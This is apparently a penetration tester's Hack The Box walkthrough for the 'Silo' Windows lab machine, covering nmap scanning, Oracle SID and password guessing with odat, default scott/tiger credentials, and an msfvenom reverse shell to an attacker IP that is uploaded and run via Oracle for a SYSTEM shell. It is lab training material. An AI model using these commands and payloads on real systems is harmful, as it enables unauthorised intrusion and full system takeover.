Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  1. Walk-throughs
  2. HTB Windows Machines

Silo HTB

IP

10.10.10.82

Initial nmap scan 

sudo nmap -p- --min-rate 10000 10.10.10.82 | cut -d"/" -f1 | tr '\n' ','

We have the following ports open

80,135,139,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162

More in-depth scan 

sudo nmap -sCV -p80,135,139,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oA nmap_scan

Results

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-19T02:09:00
|_  start_date: 2023-12-19T02:04:17

First i like to check if services allow for anonymous authenitcation

But what is also interesting is the Oracle TNS Listener could be foothold there

But first

SMB

check for anonymous logins

crackmapexec smb 10.10.10.82 -u anonymous -p ''

  • auth failed but we do have the hostname SILO and Domain name SILO well add the domain name to our hosts file

RPC

check for anonymous login

rpcclient -N -U anonymous 10.10.10.82

  • failed

Lets check out the web server

HTTP

looks like it consists of the default IIS web page

we can perform some feroxbusting and see if we can find anything interesting with both the asp and aspx file extentions

feroxbuster -u http://silo/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx

  • Gain access before this finished

while we wait for that lets investigate the Oracle TNS listener

Firstly What is oracle

  • it is a RDBMS (Relational multi-model database) produced and marketed by oracle

  • By default the Oracle database listens on port 1521

Within our nmap scan we can see the listener is described as "unauthorized" typically suggests that there are connections or activities occurring that are not permitted or expected

We can use the tool odat for brute-forcing the Oracle database TNS SIDs (Server ID)

odat sidguesser -s 10.10.10.82 -p1521

When we look at the tools output we can see the following

We have discovered an SID called XE , Now our next move is to find valid credentials on this server

for this we can also usitlise the odat tool

sudo odat passwordguesser -s 10.10.10.82 -p1521 -d XE

From the output we can see the following

We have found valid credentials for the user scott

scott/tiger

Now that we have the server id XE and the credntials for the user scott we can utilise these and upload a .exe reverseshell onto the system and gain acess to do this lets generate a reverse shell with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe

Lets start a listener

rlwrap -cAr nc -lvnp 9001

now that we have our reverse shell we can utilize the odat tool again and upload it to the system 

sudo odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp shell.exe /home/shrek123/Desktop/HTB/windows/silo/files/shell.exe

Now we can execute the shell.exe on the target system

sudo odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp shell.exe

we now have a shell on the system as nt authority\system we owned the machine

PreviousJerry HTBNextSizzle HTB

Last updated 1 year ago